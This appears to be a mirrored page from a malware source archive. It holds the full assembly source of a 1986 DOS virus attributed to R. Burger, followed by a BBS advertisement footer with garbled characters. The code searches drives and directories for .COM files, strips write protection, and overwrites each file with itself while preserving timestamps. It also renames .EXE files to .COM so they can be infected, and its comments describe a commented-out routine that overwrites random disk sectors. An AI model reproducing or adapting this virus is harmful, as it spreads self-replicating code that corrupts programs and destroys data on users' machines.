mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
462 lines
15 KiB
NASM
462 lines
15 KiB
NASM
page 70,120
|
||
Name VIRUS
|
||
;*************************************************************************
|
||
|
||
; Program Virus Ver.: 1.1
|
||
; Copyright by R. Burger 1986
|
||
; This is a demonstration program for computer
|
||
; viruses. It has the ability to replicate itself,
|
||
; and thereby modify other programs
|
||
;*************************************************************************
|
||
|
||
|
||
|
||
Code Segment
|
||
Assume CS:Code
|
||
progr equ 100h
|
||
ORG progr
|
||
|
||
;*************************************************************************
|
||
|
||
; The three NOP's serve as the marker byte of the
|
||
; virus which will allow it to identify a virus
|
||
;*************************************************************************
|
||
|
||
MAIN:
|
||
nop
|
||
nop
|
||
nop
|
||
|
||
;*************************************************************************
|
||
|
||
; Initialize the pointers
|
||
;*************************************************************************
|
||
|
||
mov ax,00
|
||
mov es:[pointer],ax
|
||
mov es:[counter],ax
|
||
mov es:[disks],al
|
||
|
||
;*************************************************************************
|
||
|
||
; Get the selected drive
|
||
;*************************************************************************
|
||
|
||
mov ah,19h ; drive?
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; Get the current path on the current drive
|
||
;*************************************************************************
|
||
|
||
mov cs:drive,al ; save drive
|
||
mov ah,47h ; dir?
|
||
mov ah,ah
|
||
mov si,si
|
||
mov dh,0
|
||
add al,1
|
||
mov dl,dl
|
||
nop ;****
|
||
mov dl,al
|
||
mov dl,dl
|
||
nop ;**** ; in actual drive
|
||
lea si,cs:old_path
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; Get the number of drives present.
|
||
; If only one drive is present, the pointer for
|
||
; search order will be set to search order + 6
|
||
;*************************************************************************
|
||
|
||
mov ah,0eh ; how many disks
|
||
mov dl,0 ;****????
|
||
int 21h
|
||
|
||
mov al,01
|
||
cmp al,01 ; one drive?
|
||
jnz hups3
|
||
mov al,06
|
||
|
||
hups3: mov ah,0
|
||
lea bx,search_order
|
||
add bx,ax
|
||
add bx,0001h
|
||
mov cs:pointer,bx
|
||
clc
|
||
|
||
;*************************************************************************
|
||
|
||
; Carry is set, if no more .COM's are found.
|
||
; Then, to avoid unnecessary work, .EXE files will
|
||
; be renamed to .COM file and infected.
|
||
; This causes the error message "Program too large
|
||
; to fit in memory" when starting larger infected
|
||
; EXE programs.
|
||
;*************************************************************************
|
||
|
||
change_disk:
|
||
jnc no_name_change
|
||
mov ah,17h ; change exe to com
|
||
lea dx,cs:maske_exe
|
||
int 21h
|
||
cmp al,0ffh
|
||
jnz no_name_change ; .EXE found?
|
||
|
||
;*************************************************************************
|
||
|
||
; If neither .COM nor .EXE is found, then sectors will
|
||
; be overwritten depending on the system time in
|
||
; milliseconds. This is the time of the complete
|
||
; "infection" of a storage medium. The virus can find
|
||
; nothing more to infect and starts its destruction.
|
||
;*************************************************************************
|
||
|
||
; mov ah,2ch ; read system clock
|
||
; int 21h
|
||
; mov bx,cs:pointer
|
||
; mov al,cs:[bx]
|
||
; mov bx,dx
|
||
; nop ;****
|
||
; mov cx,2
|
||
; nop ;****
|
||
; mov dh,0
|
||
; int 26h ; write crap on disk
|
||
|
||
db ' RB2 - LiquidCode <tm> '
|
||
;*************************************************************************
|
||
|
||
; Check if the end of the search order table has been
|
||
; reached. If so, end.
|
||
;*************************************************************************
|
||
|
||
no_name_change:
|
||
mov bx,cs:pointer
|
||
dec bx
|
||
mov cs:pointer,bx
|
||
mov dl,cs:[bx]
|
||
cmp dl,0ffh
|
||
jnz hups2
|
||
jmp hops
|
||
|
||
;*************************************************************************
|
||
|
||
; Get new drive from search order table and
|
||
; select it.
|
||
;*************************************************************************
|
||
|
||
hups2:
|
||
mov ah,0eh
|
||
mov dl,2 ;***** +
|
||
int 21h ; change disk
|
||
|
||
;*************************************************************************
|
||
|
||
; Start in the root directory
|
||
;*************************************************************************
|
||
|
||
mov ah,3bh ; change path
|
||
lea dx,path
|
||
int 21h
|
||
jmp find_first_file
|
||
|
||
;*************************************************************************
|
||
|
||
; Starting from the root, search for the first subdir
|
||
; First convert all .EXE files to .COM in the old
|
||
; directory.
|
||
;*************************************************************************
|
||
|
||
find_first_subdir:
|
||
mov ah,17h ; change exe to com
|
||
lea dx,cs:maske_exe
|
||
int 21h
|
||
mov ah,3bh ; use root dir
|
||
lea dx,path
|
||
int 21h
|
||
mov ah,04eh ;Search for first subdirectory
|
||
mov cx,00010001b ; dir mask
|
||
lea dx,maske_dir
|
||
int 21h
|
||
jc change_disk
|
||
|
||
mov bx,CS:counter
|
||
INC BX
|
||
DEC bx
|
||
jz use_next_subdir
|
||
|
||
;*************************************************************************
|
||
|
||
; Search for the next subdir. If no more directories
|
||
; are found, the drive will be changed.
|
||
;*************************************************************************
|
||
|
||
find_next_subdir:
|
||
mov ah,4fh ; search for next subdir
|
||
int 21h
|
||
jc change_disk
|
||
dec bx
|
||
jnz find_next_subdir
|
||
|
||
;*************************************************************************
|
||
|
||
; Select found directory
|
||
;*************************************************************************
|
||
|
||
use_next_subdir:
|
||
mov ah,2fh ; get dta address
|
||
int 21h
|
||
add bx,1ch
|
||
mov es:[bx],'\ ' ; address of name in dta
|
||
inc bx
|
||
push ds
|
||
mov ax,es
|
||
mov ds,ax
|
||
mov dx,bx
|
||
mov ah,3bh ; change path
|
||
int 21h
|
||
pop ds
|
||
mov bx,cs:counter
|
||
inc bx
|
||
mov CS:counter,bx
|
||
|
||
;*************************************************************************
|
||
|
||
; Find first .COM file in the current directory.
|
||
; If there are non, search the next directory.
|
||
;*************************************************************************
|
||
|
||
find_first_file:
|
||
mov ah,04eh ; Search for first
|
||
mov cx,00000001b ; mask
|
||
lea dx,maske_com ;
|
||
int 21h
|
||
jc find_first_subdir
|
||
jmp check_if_ill
|
||
|
||
;*************************************************************************
|
||
|
||
; If the program is already infected, search for
|
||
; the next program.
|
||
;*************************************************************************
|
||
|
||
find_next_file:
|
||
mov ah,4fh ; search for next
|
||
int 21h
|
||
jc find_first_subdir
|
||
|
||
;*************************************************************************
|
||
|
||
; Check if already infected by the virus.
|
||
;*************************************************************************
|
||
|
||
check_if_ill:
|
||
mov ah,3dh ; open channel
|
||
mov al,02h ; read/write
|
||
mov dx,9eh ; address of name in dta
|
||
int 21h
|
||
mov bx,ax ; save channel
|
||
mov ah,3fh ; read file
|
||
mov cx,buflen ;
|
||
mov dx,buffer ; write in buffer
|
||
int 21h
|
||
mov ah,3eh ; CLOSE FILE
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; Here we search for three NOP's.
|
||
; If present, there is already an infection. We must
|
||
; then continue the search.
|
||
;*************************************************************************
|
||
|
||
mov bx,cs:[buffer]
|
||
cmp bx,9090h
|
||
jz find_next_file
|
||
|
||
;*************************************************************************
|
||
|
||
; Bypass MS-DOS write protection if present
|
||
;*************************************************************************
|
||
|
||
mov ah,43h ; write enable
|
||
mov al,0
|
||
mov dx,9eh ; address of name in dta
|
||
int 21h
|
||
mov ah,43h
|
||
mov al,01h
|
||
and cx,11111110b
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; Open file for write access.
|
||
;*************************************************************************
|
||
|
||
mov ah,3dh ; open channel
|
||
mov al,02h ; read/write
|
||
mov dx,9eh ; address of name in dta
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; Read date entry of program and save for future use.
|
||
;*************************************************************************
|
||
|
||
mov bx,ax ; channel
|
||
mov ah,57h ; get date
|
||
mov al,0
|
||
int 21h
|
||
push cx ; save date
|
||
push dx
|
||
|
||
;*************************************************************************
|
||
|
||
; The jump located at address 0100h of the program
|
||
; will be saved for future use.
|
||
;*************************************************************************
|
||
|
||
mov dx,cs:[conta] ; save old jmp
|
||
mov cs:[jmpbuf],dx
|
||
mov dx,cs:[buffer+1] ; save new jump
|
||
lea cx,cont-100h
|
||
sub dx,cx
|
||
mov cs:[conta],dx
|
||
|
||
;*************************************************************************
|
||
|
||
; The virus copies itself to the start of the file
|
||
;*************************************************************************
|
||
|
||
mov ah,40h ; write virus
|
||
mov cx,buflen ; length buffer
|
||
lea dx,main ; write virus
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; Enter the old creation date of the file.
|
||
;*************************************************************************
|
||
|
||
mov ah,57h ; write date
|
||
mov al,1
|
||
pop dx
|
||
pop cx ; restore date
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; Close the file.
|
||
;*************************************************************************
|
||
|
||
mov ah,3eh ; close file
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; restore the old jump address.
|
||
; The virus saves at address "conta' the jump which
|
||
; was at the start of the host program.
|
||
; This is done to preserve the executability of the
|
||
; host program as much as possible.
|
||
; After saving itstill works with the jump address
|
||
; contained in the virus. The jump address in the
|
||
; virus differs from the jump address in memory
|
||
;
|
||
;*************************************************************************
|
||
|
||
mov dx,cs:[jmpbuf] ; restore old jmp
|
||
mov cs:[conta],dx
|
||
hops: nop
|
||
call use_old
|
||
|
||
;*************************************************************************
|
||
|
||
; Continue with the host program.
|
||
;*************************************************************************
|
||
|
||
cont db 0e9h ; make jump
|
||
conta dw 0
|
||
mov ah,00
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; reactivate the selected drive at the start of the
|
||
; program.
|
||
;*************************************************************************
|
||
|
||
use_old:
|
||
mov ah,0eh ; use old drive
|
||
mov dl,cs:drive
|
||
int 21h
|
||
|
||
;*************************************************************************
|
||
|
||
; Reactivate the selected path at the start of the
|
||
; program.
|
||
;*************************************************************************
|
||
|
||
mov ah,3bh ; use old dir
|
||
lea dx,old_path-1 ; get old path and backslash
|
||
int 21h
|
||
ret
|
||
|
||
|
||
search_order db 0ffh,1,0,2,3,0ffh,00,0ffh
|
||
pointer dw 0000 ; pointer f. search order
|
||
counter dw 0000 ; counter f. nth search
|
||
disks db 0 ; number of disks
|
||
|
||
|
||
maske_com db "*.com",00 ; search for com files
|
||
maske_dir db "*",00 ; search dir's
|
||
maske_exe db 0ffh,0,0,0,0,0,00111111b
|
||
db 0,"????????exe",0,0,0,0
|
||
db 0,"????????com",0
|
||
maske_all db 0ffh,0,0,0,0,0,00111111b
|
||
db 0,"???????????",0,0,0,0
|
||
db 0,"????????com",0
|
||
|
||
buffer equ 0e000h ; a safe place
|
||
|
||
buflen equ 230h ; length of virus !!!!!!
|
||
; careful
|
||
; if changing !!!!!!
|
||
|
||
jmpbuf equ buffer+buflen ; a safe place for jump
|
||
path db "\",0 ; first path
|
||
drive db 0 ; actual drive
|
||
back_slash db "\"
|
||
old_path db 32 dup(?) ; old path
|
||
|
||
code ends
|
||
|
||
end main
|
||
|
||
;*************************************************************************
|
||
; WHAT THE PROGRAM DOES:
|
||
;
|
||
; When the program is started, the first COM file in the root
|
||
; directory is infected. You can't see any changes to the
|
||
; directory entries. But if you look at the hex dump of an
|
||
; infected program, you can see the marker, which in this case
|
||
; consists of three NOP's (hex 90). WHen the infected program
|
||
; is started, the virus will first replicate itself, and then
|
||
; try to run the host program. It may run or it may not, but
|
||
; it will infect another program. This continues until all
|
||
; the COM files are infected. The next time it is run, all
|
||
; of the EXE files are changed to COM files so that they can
|
||
; be infected. In addition, the manipulation task of the virus
|
||
; begins, which consists of the random destruction of disk
|
||
; sectors.
|
||
;*************************************************************************
|
||
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|